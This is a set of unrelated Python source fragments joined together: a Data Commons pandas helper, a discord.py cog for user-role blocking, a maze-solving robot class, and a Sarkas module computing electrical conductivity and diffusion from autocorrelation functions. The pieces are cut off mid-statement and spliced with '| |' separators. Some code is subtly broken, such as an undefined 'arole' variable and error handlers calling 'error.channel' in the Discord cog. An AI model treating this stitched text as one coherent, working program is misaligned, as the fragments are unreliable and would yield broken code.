A pandas DataFrame with Place IDs as the index, and sorted dates as columns.
"""
try:
if isinstance(places, six.string_types):
places = [places]
else:
places = list(places)
assert all(isinstance(place, six.string_types) for place in places)
except:
raise ValueError(
'Parameter `places` must be a string object or list-like object of string.'
)
if not isinstance(stat_var, six.string_types):
raise ValueError('Parameter `stat_var` must be a string.')
df = pd.DataFrame.from_records(_time_series_pd_input(places, stat_var))
df.set_index('place', inplace=True)
df.sort_index(inplace=True)
return df[sorted(df.columns, reverse=desc_col)]
def _multivariate_pd_input(places, stat_vars):
"""Returns a `list` of `dict` per element of `places` based on the `stat_var`.
Data Commons will pick a set of StatVarObservation options that covers the
maximum number of queried places. Among ties, Data Commons selects an option
set with the latest Observation.
Args:
places (`str` or `iterable` of `str`): The dcids of Places to query for.
stat_vars (`Iterable` of `str`): The dcids of the StatisticalVariables.
Returns:
A `list` of `dict`, one per element of `places`. Each `dict` consists of
the time series and place identifier.
Examples:
>>> _multivariate_pd_input(["geoId/29", "geoId/33"],
["Count_Person", "Median_Income_Person"])
[
{'Count_Person': 20, 'Median_Income_Person': 40, 'place': 'geoId/29'},
{'Count_Person': 428, 'Median_Income_Person': 429, 'place': 'geoId/33'}
]
"""
rows_dict = _group_stat_all_by_obs_options(places,
stat_vars,
keep_series=False)
place2cov = collections.defaultdict(dict) # {geo: {var1: 3, var2: 33}}
for stat_var, candidates_dict in rows_dict.items():
selected_rows = None
most_geos = []
max_geo_count_so_far = 0
latest_date = []
latest_date_so_far = ''
for options, rows in candidates_dict.items():
current_geos = len(rows)
if current_geos > max_geo_count_so_far:
max_geo_count_so_far = current_geos
most_geos = [options]
# Reset tiebreaker stats. Recompute after this if-else block.
latest_date = []
latest_date_so_far = ''
elif current_geos == max_geo_count_so_far:
most_geos.append(options)
else:
# Do not compute tiebreaker stats if not in most_geos.
continue
for row in rows:
row_date = row['date']
if row_date > latest_date_so_far:
latest_date_so_far = row_date
latest_date = [options]
elif row_date == latest_date_so_far:
latest_date.append(options)
for options in most_geos:
if options in latest_date:
selected_rows = candidates_dict[options]
for row in selected_rows:
place2cov[row['place']][stat_var] = row['val']
return [
dict({'place': place}, **multivariates)
for place, multivariates in place2cov.items()
]
def build_multivariate_dataframe(places, stat_vars):
"""Constructs a pandas DataFrame with `places` as the index and `stat_vars` as the columns.
To ensure statistics are comparable across all Places, when multiple
StatVarObservations options are available for Place and StatVar combos,
Data Commons selects the StatVarObservation options that covers the most
Places, and breaks ties using the StatVarObservation options that yield
the latest Observation for any Place.
Args:
places (`str` or `iterable` of `str`): The dcids of Places to query for.
stat_vars (`Iterable` of `str`): The dcids of the StatisticalVariables.
Returns:
A pandas DataFrame with Place IDs as the index and `stat_vars` as columns.
"""
try:
if isinstance(places, six.string_types):
places = [places]
else:
places = list(places)
assert all(isinstance(place, six.string_types) for place in places)
if isinstance(stat_vars, six.string_types):
stat_vars = [stat_vars]
else:
stat_vars = list(stat_vars)
assert all(
isinstance(stat_var, six.string_types)
for stat_var in stat_vars)
except:
raise ValueError(
'Parameter `places` and `stat_vars` must be string object or list-like object.'
)
df = | |
<gh_stars>0
import asyncio
import discord
import random
from discord.ext import commands
from Cogs import Settings
from Cogs import DisplayName
from Cogs import Nullify
def setup(bot):
# Add the bot and deps
settings = bot.get_cog("Settings")
bot.add_cog(UserRole(bot, settings))
class UserRole(commands.Cog):
def __init__(self, bot, settings):
self.bot = bot
self.settings = settings
self.loop_list = []
def _is_submodule(self, parent, child):
return parent == child or child.startswith(parent + ".")
@commands.Cog.listener()
async def on_unloaded_extension(self, ext):
# Called to shut things down
if not self._is_submodule(ext.__name__, self.__module__):
return
for task in self.loop_list:
task.cancel()
@commands.Cog.listener()
async def on_loaded_extension(self, ext):
# See if we were loaded
if not self._is_submodule(ext.__name__, self.__module__):
return
# Add a loop to remove expired user blocks in the UserRoleBlock list
self.loop_list.append(self.bot.loop.create_task(self.block_check_list()))
async def block_check_list(self):
await self.bot.wait_until_ready()
while not self.bot.is_closed():
# Iterate through the ids in the UserRoleBlock list and
# remove any for members who aren't here
for guild in self.bot.guilds:
block_list = self.settings.getServerStat(guild, "UserRoleBlock")
rem_list = [ x for x in block_list if not guild.get_member(x) ]
if len(rem_list):
block_list = [ x for x in block_list if x not in rem_list ]
self.settings.setServerStat(guild, "UserRoleBlock", block_list)
# Check once per hour
await asyncio.sleep(3600)
@commands.command(pass_context=True)
async def urblock(self, ctx, *, member = None):
"""Blocks a user from using the UserRole system and removes applicable roles (bot-admin only)."""
isAdmin = ctx.author.permissions_in(ctx.channel).administrator
if not isAdmin:
checkAdmin = self.settings.getServerStat(ctx.guild, "AdminArray")
for role in ctx.author.roles:
for aRole in checkAdmin:
# Get the role that corresponds to the id
if str(aRole['ID']) == str(role.id):
isAdmin = True
break
# Only allow bot-admins to change server stats
if not isAdmin:
await ctx.send('You do not have sufficient privileges to access this command.')
return
# Get the target user
mem = DisplayName.memberForName(member, ctx.guild)
if not mem:
await ctx.send("I couldn't find `{}`.".format(member.replace("`", "\\`")))
return
# Check if we're trying to block a bot-admin
isAdmin = mem.permissions_in(ctx.channel).administrator
if not isAdmin:
checkAdmin = self.settings.getServerStat(ctx.guild, "AdminArray")
for role in mem.roles:
for aRole in checkAdmin:
# Get the role that corresponds to the id
if str(aRole['ID']) == str(role.id):
isAdmin = True
break
# Only allow bot-admins to change server stats
if isAdmin:
await ctx.send("You can't block other admins or bot-admins from the UserRole module.")
return
# At this point - we have someone to block - see if they're already blocked
block_list = self.settings.getServerStat(ctx.guild, "UserRoleBlock")
m = ""
if mem.id in block_list:
m += "`{}` is already blocked from the UserRole module.".format(DisplayName.name(mem).replace("`", "\\`"))
else:
block_list.append(mem.id)
self.settings.setServerStat(ctx.guild, "UserRoleBlock", block_list)
m += "`{}` now blocked from the UserRole module.".format(DisplayName.name(mem).replace("`", "\\`"))
# Remove any roles
# Get the array
try:
promoArray = self.settings.getServerStat(ctx.guild, "UserRoles")
except Exception:
promoArray = []
if promoArray == None:
promoArray = []
# Populate the roles that need to be removed
remRole = []
for arole in promoArray:
roleTest = DisplayName.roleForID(arole['ID'], ctx.guild)
if not roleTest:
# Not a real role - skip
continue
if roleTest in mem.roles:
# We have it
remRole.append(roleTest)
if len(remRole):
# Only remove if we have roles to remove
self.settings.role.rem_roles(mem, remRole)
m += "\n\n*{} {}* removed.".format(len(remRole), "role" if len(remRole) == 1 else "roles")
await ctx.send(m)
@commands.command(pass_context=True)
async def urunblock(self, ctx, *, member = None):
"""Unblocks a user from the UserRole system (bot-admin only)."""
isAdmin = ctx.author.permissions_in(ctx.channel).administrator
if not isAdmin:
checkAdmin = self.settings.getServerStat(ctx.guild, "AdminArray")
for role in ctx.author.roles:
for aRole in checkAdmin:
# Get the role that corresponds to the id
if str(aRole['ID']) == str(role.id):
isAdmin = True
break
# Only allow bot-admins to change server stats
if not isAdmin:
await ctx.send('You do not have sufficient privileges to access this command.')
return
# Get the target user
mem = DisplayName.memberForName(member, ctx.guild)
if not mem:
await ctx.send("I couldn't find `{}`.".format(member.replace("`", "\\`")))
return
# At this point - we have someone to unblock - see if they're blocked
block_list = self.settings.getServerStat(ctx.guild, "UserRoleBlock")
if not mem.id in block_list:
await ctx.send("`{}` is not blocked from the UserRole module.".format(DisplayName.name(mem).replace("`", "\\`")))
return
block_list.remove(mem.id)
self.settings.setServerStat(ctx.guild, "UserRoleBlock", block_list)
await ctx.send("`{}` has been unblocked from the UserRole module.".format(DisplayName.name(mem).replace("`", "\\`")))
@commands.command(pass_context=True)
async def isurblocked(self, ctx, *, member = None):
"""Outputs whether or not the passed user is blocked from the UserRole module."""
if member == None:
member = "{}".format(ctx.author.mention)
# Get the target user
mem = DisplayName.memberForName(member, ctx.guild)
if not mem:
await ctx.send("I couldn't find `{}`.".format(member.replace("`", "\\`")))
return
block_list = self.settings.getServerStat(ctx.guild, "UserRoleBlock")
name = "You are" if mem.id == ctx.author.id else "`"+DisplayName.name(mem).replace("`", "\\`") + "` is"
if mem.id in block_list:
await ctx.send(name + " blocked from the UserRole module.")
else:
await ctx.send(name + " not blocked from the UserRole module.")
@commands.command(pass_context=True)
async def adduserrole(self, ctx, *, role = None):
"""Adds a new role to the user role system (admin only)."""
author = ctx.message.author
server = ctx.message.guild
channel = ctx.message.channel
usage = 'Usage: `{}adduserrole [role]`'.format(ctx.prefix)
# Check if we're suppressing @here and @everyone mentions
if self.settings.getServerStat(server, "SuppressMentions"):
suppress = True
else:
suppress = False
isAdmin = author.permissions_in(channel).administrator
# Only allow admins to change server stats
if not isAdmin:
await channel.send('You do not have sufficient privileges to access this command.')
return
if role == None:
await ctx.send(usage)
return
if type(role) is str:
if role == "everyone":
role = "@everyone"
# It' a string - the hope continues
roleCheck = DisplayName.roleForName(role, server)
if not roleCheck:
msg = "I couldn't find **{}**...".format(role)
if suppress:
msg = Nullify.clean(msg)
await ctx.send(msg)
return
role = roleCheck
# Now we see if we already have that role in our list
try:
promoArray = self.settings.getServerStat(server, "UserRoles")
except Exception:
promoArray = []
if promoArray == None:
promoArray = []
for aRole in promoArray:
# Get the role that corresponds to the id
if str(aRole['ID']) == str(role.id):
# We found it - throw an error message and return
msg = '**{}** is already in the list.'.format(role.name)
# Check for suppress
if suppress:
msg = Nullify.clean(msg)
await channel.send(msg)
return
# If we made it this far - then we can add it
promoArray.append({ 'ID' : role.id, 'Name' : role.name })
self.settings.setServerStat(server, "UserRoles", promoArray)
msg = '**{}** added to list.'.format(role.name)
# Check for suppress
if suppress:
msg = Nullify.clean(msg)
await channel.send(msg)
return
@adduserrole.error
async def adduserrole_error(self, ctx, error):
# do stuff
msg = 'adduserrole Error: {}'.format(ctx)
await error.channel.send(msg)
@commands.command(pass_context=True)
async def removeuserrole(self, ctx, *, role = None):
"""Removes a role from the user role system (admin only)."""
author = ctx.message.author
server = ctx.message.guild
channel = ctx.message.channel
usage = 'Usage: `{}removeuserrole [role]`'.format(ctx.prefix)
# Check if we're suppressing @here and @everyone mentions
if self.settings.getServerStat(server, "SuppressMentions"):
suppress = True
else:
suppress = False
isAdmin = author.permissions_in(channel).administrator
# Only allow admins to change server stats
if not isAdmin:
await channel.send('You do not have sufficient privileges to access this command.')
return
if role == None:
await channel.send(usage)
return
if type(role) is str:
if role == "everyone":
role = "@everyone"
# It' a string - the hope continues
# Let's clear out by name first - then by role id
try:
promoArray = self.settings.getServerStat(server, "UserRoles")
except Exception:
promoArray = []
if promoArray == None:
promoArray = []
for aRole in promoArray:
# Get the role that corresponds to the name
if aRole['Name'].lower() == role.lower():
# We found it - let's remove it
promoArray.remove(aRole)
self.settings.setServerStat(server, "UserRoles", promoArray)
msg = '**{}** removed successfully.'.format(aRole['Name'])
# Check for suppress
if suppress:
msg = Nullify.clean(msg)
await channel.send(msg)
return
# At this point - no name
# Let's see if it's a role that's had a name change
roleCheck = DisplayName.roleForName(role, server)
if roleCheck:
# We got a role
# If we're here - then the role is an actual role
try:
promoArray = self.settings.getServerStat(server, "UserRoles")
except Exception:
promoArray = []
if promoArray == None:
promoArray = []
for aRole in promoArray:
# Get the role that corresponds to the id
if str(aRole['ID']) == str(roleCheck.id):
# We found it - let's remove it
promoArray.remove(aRole)
self.settings.setServerStat(server, "UserRoles", promoArray)
msg = '**{}** removed successfully.'.format(aRole['Name'])
# Check for suppress
if suppress:
msg = Nullify.clean(msg)
await channel.send(msg)
return
# If we made it this far - then we didn't find it
msg = '*{}* not found in list.'.format(roleCheck.name)
# Check for suppress
if suppress:
msg = Nullify.clean(msg)
await channel.send(msg)
return
# If we're here - then the role is an actual role - I think?
try:
promoArray = self.settings.getServerStat(server, "UserRoles")
except Exception:
promoArray = []
if promoArray == None:
promoArray = []
for aRole in promoArray:
# Get the role that corresponds to the id
if str(arole['ID']) == str(role.id):
# We found it - let's remove it
promoArray.remove(aRole)
self.settings.setServerStat(server, "UserRoles", promoArray)
msg = '**{}** removed successfully.'.format(aRole['Name'])
# Check for suppress
if suppress:
msg = Nullify.clean(msg)
await channel.send(msg)
return
# If we made it this far - then we didn't find it
msg = '*{}* not found in list.'.format(role.name)
# Check for suppress
if suppress:
msg = Nullify.clean(msg)
await channel.send(msg)
@removeuserrole.error
async def removeuserrole_error(self, ctx, error):
# do stuff
msg = 'removeuserrole Error: {}'.format(ctx)
await error.channel.send(msg)
@commands.command(pass_context=True)
async def listuserroles(self, ctx):
"""Lists all roles for the user role system."""
server = ctx.message.guild
channel = ctx.message.channel
# Check if we're suppressing @here and @everyone mentions
if self.settings.getServerStat(server, "SuppressMentions"):
suppress = True
else:
suppress = False
# Get the array
try:
promoArray = self.settings.getServerStat(server, "UserRoles")
except Exception:
promoArray = []
if promoArray == None:
promoArray = []
if not len(promoArray):
msg = "There aren't any roles in the user role list yet. Add some with the `{}adduserrole` command!".format(ctx.prefix)
await ctx.channel.send(msg)
return
# Sort by XP first, then by name
# promoSorted = sorted(promoArray, key=itemgetter('XP', 'Name'))
promoSorted = sorted(promoArray, key=lambda x:x['Name'])
roleText = "**__Current Roles:__**\n\n"
for arole in promoSorted:
# Get current role name based on id
foundRole = False
for role in server.roles:
if str(role.id) == str(arole['ID']):
# We found it
foundRole = True
roleText = '{}**{}**\n'.format(roleText, role.name)
if not foundRole:
roleText = '{}**{}** (removed from server)\n'.format(roleText, arole['Name'])
# Check for suppress
if suppress:
roleText = Nullify.clean(roleText)
await channel.send(roleText)
@commands.command(pass_context=True)
async def oneuserrole(self, ctx, *, yes_no = None):
"""Turns on/off one user role at a time (bot-admin only; always on by default)."""
# Check for admin status
isAdmin = ctx.author.permissions_in(ctx.channel).administrator
if not isAdmin:
checkAdmin = self.settings.getServerStat(ctx.guild, "AdminArray")
for role in ctx.author.roles:
for aRole in checkAdmin:
# Get the role that corresponds to | |
<filename>robot_motion_planning/code/robot.py
import numpy as np
import json
import random
from sys import stderr
class Robot(object):
def __init__(self, maze_dim):
"""
set up attributes that the robot
will use to learn and navigate the maze. Some initial attributes are
provided based on common information, including the size of the maze
the robot is placed in.
Args:
maze_dim: int providing maze dimensions
(e.g. 12 means that maze has dimensions 12x12)
Returns:
None
"""
self.maze_dim = maze_dim
self.maze_area = maze_dim ** 2.
# robot location tracking variables
self.location_orig = [0, 0]
self.location = [0, 0]
self.location_last = [0, 0]
self.heading = 'up'
# variables to create robot's internal map of the maze
self.maze_grid = np.zeros((maze_dim, maze_dim), dtype=np.int) # Grid for wall locations for each maze.
self.path_grid = np.zeros((maze_dim, maze_dim), dtype=np.int)
self.visited_grid = np.zeros((maze_dim, maze_dim), dtype=np.int) #visited paths used for Treumax algo
self.visited_grid_previous_heading = np.zeros((maze_dim, maze_dim), dtype=object) #visited paths used for Treumax algo
# measuring number of steps in which the maze was solved
self.step_count = 0
# Maximum allowed movement units per turn
self.max_movement = 3
self.backtracking = False
self.is_reversing = False #to indicate that 180 degrees turn must be completed (done by two right turns)
# Robot's operational mode
# This decides robot's action when next_move() is called.
self.mode = "explore"
# Flag that indicates the first step of exploration
self.is_beginning = True
#possible path grid values
self.UNVISITED = 0
self.VISITED = 1
self.DOUBLE_VISITED = 2
self.SHORTEST = 3 # marking shortest path, so it can be visualized
# Numbers assigned to open walls in cells.
self.wall_values = {'up': 1,
'right': 2,
'down': 4,
'left': 8}
# Internal robot's maze cell map
# Each number represents a four-bit number that has a bit value of 0 if an edge is closed (walled) and
# 1 if an edge is open (no wall); the 1s register corresponds with the upwards-facing side, the 2s register
# the right side, the 4s register the bottom side, and the 8s register the left side. For example,
# the number 10 means that a square is open on the left and right,
# with walls on top and bottom (0*1 + 1*2 + 0*4 + 1*8 = 10).
# The index origin (0, 0) is at the bottom left
self.maze_map = [[0 for _ in range(maze_dim)] for _ in range(maze_dim)]
# Corresponding new headings after rotating
self.dict_rotation = {'up': ['left', 'right'],
'right': ['up', 'down'],
'down': ['right', 'left'],
'left': ['down', 'up']}
# Opposite directions
self.opposite = {'up': 'down',
'right': 'left',
'down': 'up',
'left': 'right'}
# Vectors for different directions
self.direction_to_vec = {'up': [0, 1],
'right': [1, 0],
'down': [0, -1],
'left': [-1, 0]}
# Rotation matrices
self.rot_matrices = {'left': np.array([(0, 1), (-1, 0)]),
'up': np.array([(1, 0), (0, 1)]),
'right': np.array([(0, -1), (1, 0)])}
# Dictionary for backtracking, translates robot's headings into direction relative to the maze
self.direction_to_rotation = {
heading: {directions[0]: -90, directions[1]: 90}
for heading, directions in self.dict_rotation.items()}
# Policy grid which will be created after performing a search algorithm.
self.policy_grid = [['' for _ in range(self.maze_dim)] for _ in
range(self.maze_dim)]
# Text file in which the travelled path will be logged.
self.log_filename = 'robot_path.json'
# create file logging visited path and write head line
with open(self.log_filename, 'w+') as file:
file.write('[step_count, robot_x, robot_y, visited, heading]\n')
# decides whether debug message will be displayed
self.DEBUG = False
def print_debug(self, debug_message):
"""Prints debug message if Debug mode is set to True
Args:
debug_message: string to be printed
Returns:
None
Examples:
>>> print_debug("move robot to the right")
"""
if self.DEBUG == True:
print("[ Debug message ]: {0}".format(debug_message))
def wall_follower(self, sensors):
"""Wall follower algorithm deciding on the next step
The wall follower algorithm works only for simply connected maze types.
Left-hand rule is used.
Args:
sensors: list of three int values indicating number of open squares
in front of the left, center, and right sensors (in that order)
Returns:
rotation, movement
- rotation: integer indicating the robot’s rotation on that timestep.
taking one of three values: -90, 90, or 0
for counterclockwise, clockwise, or no rotation (in that order)
- movement: integer indicating the robot’s movement on that timestep
movement follows the rotiation in the range [-3, 3] inclusive
Examples:
>>> sensors=[0, 10, 0]
>>> rotation, movement = self.wall_follower(sensors)
"""
movement = 0
rotation = 0
# 1. If you can turn left, do it
if sensors[0] > 0:
movement = 1
rotation = -90
self.print_debug("move left")
# 2. Else (If you can't turn left), if you can continue going straight,
# do it
elif sensors[1] > 0:
movement = 1
rotation = 0
self.print_debug("move 1 forward")
# 3. Else (If you can't do either of the previous steps),
# if you can turn right,do it
elif sensors[2] > 0:
movement = 1
rotation = 90
self.print_debug("move right")
# 4. If you reached a dead end, turn back 180 degrees
# (done in two steps by turning right)
else:
movement = 0
rotation = 90
self.print_debug("dead end, turn to the right, no movement")
return rotation, movement
def update_map(self, possible_directions):
"""Update the robot's internal map using the unblocked (open)
directions detected by the current sensor readings.
Args:
possible_directions: list of possible directions
can contain those values: 'left', 'right', 'forward'
Returns:
None
Examples:
>>> possible_directions=['left', 'forward']
>>> rotation, movement = self.update_map(possible_directions)
"""
# Get the unit vector which points in the direction of the robot's heading
movement_vec = np.array(self.direction_to_vec[self.heading])
# First, translate the detected openings into global directions
for direction in possible_directions:
global_dir = None
if direction == 'left':
global_dir = self.dict_rotation[self.heading][0]
elif direction == 'right':
global_dir = self.dict_rotation[self.heading][1]
elif direction == 'up':
global_dir = self.heading
# Get the corresponding wall value for an wall opening in the given direction
wall_value = self.wall_values[global_dir]
# Update the current map cell with the new wall value
self.maze_map[self.location[0]][self.location[1]] |= wall_value
# Rotate robot's direction vector to given direction
dir_vec = np.dot(movement_vec, self.rot_matrices[direction])
# Get the wall opening value for the next cell
wall_value = self.wall_values[self.opposite[global_dir]]
# Update the next map cell with the opening that can be seen from this cell.
# maps entries to deadends.
self.maze_map[self.location[0] + dir_vec[0]][
self.location[1] + dir_vec[1]] |= wall_value
def next_move(self, sensors):
"""
This function determines the next move the robot should make,
based on the input from the sensors after its previous move.
Args:
sensors: inputs are a list of three distances from the robot's left,
front, and right-facing sensors, in that order
Returns:
rotation: indicates desired robot rotation (if any) as a number:
0 for no rotation, +90 for a 90-degree rotation clockwise,
and -90 for a 90-degree rotation counterclockwise.
Other values will result in no rotation.
movement: indicates robot movement, and the robot will attempt
to move the number of indicated squares: a positive number
indicates forwards movement, while a negative number indicates
backwards movement. The robot may move a
maximum of three units per turn. Any excess movement is ignored.
If the robot wants to end a run (e.g. during the first training run in
the maze) then returing the tuple ('Reset', 'Reset') will indicate to
the tester to end the run and return the robot to the start.
"""
rotation = 0
movement = 0
# measure number of steps to solve maze
self.step_count +=1
self.print_debug("=== {0}.step ===".format(self.step_count))
if self.mode == "explore":
# explore and map the complete maze
rotation, | |
from IPython import get_ipython
if get_ipython().__class__.__name__ == 'ZMQInteractiveShell':
from tqdm import tqdm_notebook as tqdm
else:
from tqdm import tqdm
import os
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
# Sarkas Modules
import sarkas.tools.observables as obs
class TransportCoefficient:
"""
Transport Coefficients class.
"""
def __init__(self):
pass
def __repr__(self):
sortedDict = dict(sorted(self.__dict__.items(), key=lambda x: x[0].lower()))
disp = 'Transport( \n'
for key, value in sortedDict.items():
disp += "\t{} : {}\n".format(key, value)
disp += ')'
return disp
@staticmethod
def pretty_print(observable, tc_name):
"""Print to screen the location where data is stored and other relevant information.
Parameters
----------
observable: sarkas.tools.observables.Observable
Physical quantity of the ACF.
tc_name: str
Name of Transport coefficient to calculate.
"""
print('Data saved in: \n', os.path.join(observable.saving_dir, tc_name + '_' + observable.job_id + '.h5'))
print('\nNo. of slices = {}'.format(observable.no_slices))
print('No. dumps per slice = {}'.format(int(observable.slice_steps / observable.dump_step)))
print('Time interval of autocorrelation function = {:.4e} [s] ~ {} w_p T'.format(
observable.dt * observable.slice_steps,
int(observable.dt * observable.slice_steps * observable.total_plasma_frequency)))
@staticmethod
def electrical_conductivity(params,
phase: str = 'production',
compute_acf: bool = True,
no_slices: int = 1,
plot: bool = True,
show: bool = False,
figname: str = None,
**kwargs):
"""
Calculate electrical conductivity from current auto-correlation function.
Parameters
----------
params : sarkas.core.Parameters
Simulation's parameters.
phase : str
Phase to analyze. Default = 'production'.
show : bool
Flag for prompting plot to screen.
Returns
-------
coefficient : pandas.DataFrame
Pandas dataframe containing the value of the transport coefficient as a function of integration time.
"""
print('\n\n{:=^70} \n'.format(' Electrical Conductivity '))
coefficient = pd.DataFrame()
if compute_acf:
jc_acf = obs.ElectricCurrent()
jc_acf.setup(params, phase=phase, no_slices=no_slices, **kwargs)
jc_acf.compute()
else:
jc_acf = obs.ElectricCurrent()
jc_acf.setup(params, phase=phase, no_slices=no_slices, **kwargs)
jc_acf.parse()
# Print some info
TransportCoefficient.pretty_print(jc_acf, 'ElectricalConductivity')
no_int = jc_acf.slice_steps
# to_numpy creates a 2d-array, hence the [:,0]
time = jc_acf.dataframe[("Time")].to_numpy()[:, 0]
coefficient["Time"] = time
jc_str = "Electric Current ACF"
sigma_str = "Electrical Conductivity"
for isl in tqdm(range(jc_acf.no_slices), disable = not jc_acf.verbose):
sigma_ij = np.zeros(jc_acf.slice_steps)
integrand = np.array(jc_acf.dataframe[(jc_str, "Total", "slice {}".format(isl))])
for it in range(1, no_int):
sigma_ij[it] = np.trapz(integrand[:it] / integrand[0], x=time[:it])
coefficient[sigma_str + "_slice {}".format(isl)] = sigma_ij[:]
col_str = [sigma_str + "_slice {}".format(isl) for isl in range(jc_acf.no_slices)]
coefficient[sigma_str + "_Mean"] = coefficient[col_str].mean(axis=1)
coefficient[sigma_str + "_Std"] = coefficient[col_str].std(axis=1)
coefficient.columns = pd.MultiIndex.from_tuples([tuple(c.split("_")) for c in coefficient.columns])
coefficient.to_hdf(
os.path.join(jc_acf.saving_dir, 'ElectricalConductivity_' + jc_acf.job_id + '.h5'),
mode='w',
key='conductivity',
index=False)
if plot or figname:
# Make the plot
fig, (ax1, ax2) = plt.subplots(1, 2, figsize=(16, 7))
ax3 = ax1.twiny()
ax4 = ax2.twiny()
# extra space for the second axis at the bottom
# fig.subplots_adjust(bottom=0.2)
acf_avg = jc_acf.dataframe[(jc_str, "Total", "Mean")]
acf_std = jc_acf.dataframe[(jc_str, "Total", "Std")]
d_avg = coefficient[(sigma_str, "Mean")]
d_std = coefficient[(sigma_str, "Std")]
# Calculate axis multipliers and labels
xmul, ymul, _, _, xlbl, ylbl = obs.plot_labels(time, d_avg, "Time", "Conductivity", jc_acf.units)
# ACF
ax1.plot(xmul * time, acf_avg / acf_avg.iloc[0], label=r'Current $J$')
ax1.fill_between(
xmul * time,
(acf_avg + acf_std) / (acf_avg.iloc[0] + acf_std.iloc[0]),
(acf_avg - acf_std) / (acf_avg.iloc[0] - acf_std.iloc[0]), alpha=0.2)
# Coefficient
ax2.plot(xmul * time, ymul * d_avg, label=r'$\sigma$')
ax2.fill_between(xmul * time, ymul * (d_avg + d_std), ymul * (d_avg - d_std), alpha=0.2)
xlims = (xmul * time[1], xmul * time[-1] * 1.5)
ax1.set(xlim=xlims, xscale='log', ylabel=r'Electric Current ACF', xlabel=r"Time difference" + xlbl)
ax2.set(xlim=xlims, xscale='log', ylabel=r'Conductivity' + ylbl, xlabel=r"$\tau$" + xlbl)
ax1.legend(loc='best')
ax2.legend(loc='best')
# Finish the index axes
for axi in [ax3, ax4]:
axi.grid(alpha=0.1)
axi.set(xlim=(1, jc_acf.slice_steps * 1.5), xscale='log', xlabel='Index')
fig.tight_layout()
if figname:
fig.savefig(os.path.join(jc_acf.saving_dir, figname))
else:
fig.savefig(os.path.join(jc_acf.saving_dir, 'Plot_ElectricConductivity_' + jc_acf.job_id + '.png'))
if show:
fig.show()
return coefficient
@staticmethod
def diffusion(params,
phase: str = 'production',
compute_acf: bool = True,
no_slices: int = 1,
plot: bool = True,
show: bool = False,
figname: str = None,
**kwargs):
"""
Calculate the self-diffusion coefficient from the velocity auto-correlation function.
Parameters
----------
params : sarkas.core.Parameters
Simulation's parameters.
phase : str, optional
Phase to analyze. Default = 'production'.
compute_acf : bool, optional
Flag for recalculating the ACF. Default = True.
If False it will read in the data from the dataframe.
no_slices : int, optional
Number of slices of the simulation. Default = 1.
plot : bool, optional
Flag to plot transport coefficient with corresponding autocorrelation function. Default = True.
show : bool, optional
Flag for prompting plot to screen.
figname : str, optional
Name with which to save the file. It automatically saves it in the correct directory.
**kwargs:
Arguments to pass :meth:`sarkas.tools.observables.VelocityAutoCorrelationFunction`
Returns
-------
coefficient : pandas.DataFrame
Pandas dataframe containing the value of the transport coefficient as a function of integration time.
"""
print('\n\n{:=^70} \n'.format(' Diffusion Coefficient '))
coefficient = pd.DataFrame()
if compute_acf:
vacf = obs.VelocityAutoCorrelationFunction()
vacf.setup(params, phase=phase, no_slices=no_slices, **kwargs)
vacf.compute()
else:
vacf = obs.VelocityAutoCorrelationFunction()
vacf.setup(params, phase=phase, no_slices=no_slices, **kwargs)
vacf.parse()
TransportCoefficient.pretty_print(vacf, 'Diffusion')
time = vacf.dataframe["Time"].to_numpy()[:, 0]
coefficient["Time"] = time
vacf_str = 'VACF'
const = 1.0 / 3.0
if not params.magnetized:
# Loop over time slices
for isl in tqdm(range(vacf.no_slices), disable = not vacf.verbose):
# Initialize the temporary diffusion container
D = np.zeros((params.num_species, vacf.slice_steps))
# Iterate over the number of species
for i, sp in enumerate(params.species_names):
sp_vacf_str = "{} ".format(sp) + vacf_str
# Grab vacf data of each slice
integrand = np.array(vacf.dataframe[(sp_vacf_str, "Total", "slice {}".format(isl))])
# Integrate each timestep
for it in range(1, len(time)):
D[i, it] = const * np.trapz(integrand[:it], x=time[:it])
coefficient["{} Diffusion_slice {}".format(sp, isl)] = D[i, :]
# Average and std of each diffusion coefficient.
for isp, sp in enumerate(params.species_names):
col_str = ["{} Diffusion_slice {}".format(sp, isl) for isl in range(vacf.no_slices)]
coefficient["{} Diffusion_Mean".format(sp)] = coefficient[col_str].mean(axis=1)
coefficient["{} Diffusion_Std".format(sp)] = coefficient[col_str].std(axis=1)
else:
# Loop over time slices
for isl in tqdm(range(vacf.no_slices), disable = not vacf.verbose):
# Initialize the temporary diffusion container
D = np.zeros((params.num_species, 2, len(time)))
# Iterate over the number of species
for i, sp in enumerate(params.species_names):
sp_vacf_str = "{} ".format(sp) + vacf_str
integrand_par = np.array(vacf.dataframe[(sp_vacf_str, 'Z', "slice {}".format(isl))])
integrand_perp = np.array(vacf.dataframe[(sp_vacf_str, 'X', "slice {}".format(isl))]) + \
np.array(vacf.dataframe[(sp_vacf_str, 'Y', "slice {}".format(isl))])
for it in range(1, len(time)):
D[i, 0, it] = np.trapz(integrand_par[:it], x=time[:it])
D[i, 1, it] = 0.5 * np.trapz(integrand_perp[:it], x=time[:it])
coefficient["{} Parallel Diffusion_slice {}".format(sp, isl)] = D[i, 0, :]
coefficient["{} Perpendicular Diffusion_slice {}".format(sp, isl)] = D[i, 1, :]
# Add the average and std of perp and par VACF to its dataframe
for isp, sp in enumerate(params.species_names):
par_col_str = ["{} Z Velocity ACF slice {}".format(sp, isl) for isl in range(vacf.no_slices)]
vacf.dataframe["{} Parallel Velocity ACF avg".format(sp)] = vacf.dataframe[par_col_str].mean(axis=1)
vacf.dataframe["{} Parallel Velocity ACF std".format(sp)] = vacf.dataframe[par_col_str].std(axis=1)
x_col_str = ["{} X Velocity ACF slice {}".format(sp, isl) for isl in range(vacf.no_slices)]
y_col_str = ["{} Y Velocity ACF slice {}".format(sp, isl) for isl in range(vacf.no_slices)]
perp_vacf = 0.5 * (np.array(vacf.dataframe[x_col_str]) + np.array(vacf.dataframe[y_col_str]))
vacf.dataframe["{} Perpendicular Velocity ACF avg".format(sp)] = perp_vacf.mean(axis=1)
vacf.dataframe["{} Perpendicular Velocity ACF std".format(sp)] = perp_vacf.std(axis=1)
# Average and std of each diffusion coefficient.
par_col_str = ["{} Parallel Diffusion slice {}".format(sp, isl) for isl in range(vacf.no_slices)]
perp_col_str = ["{} Perpendicular Diffusion slice {}".format(sp, isl) for isl in range(vacf.no_slices)]
coefficient["{} Parallel Diffusion avg".format(sp)] = coefficient[par_col_str].mean(axis=1)
coefficient["{} Parallel Diffusion std".format(sp)] = coefficient[par_col_str].std(axis=1)
coefficient["{} Perpendicular Diffusion avg".format(sp)] = coefficient[perp_col_str].mean(axis=1)
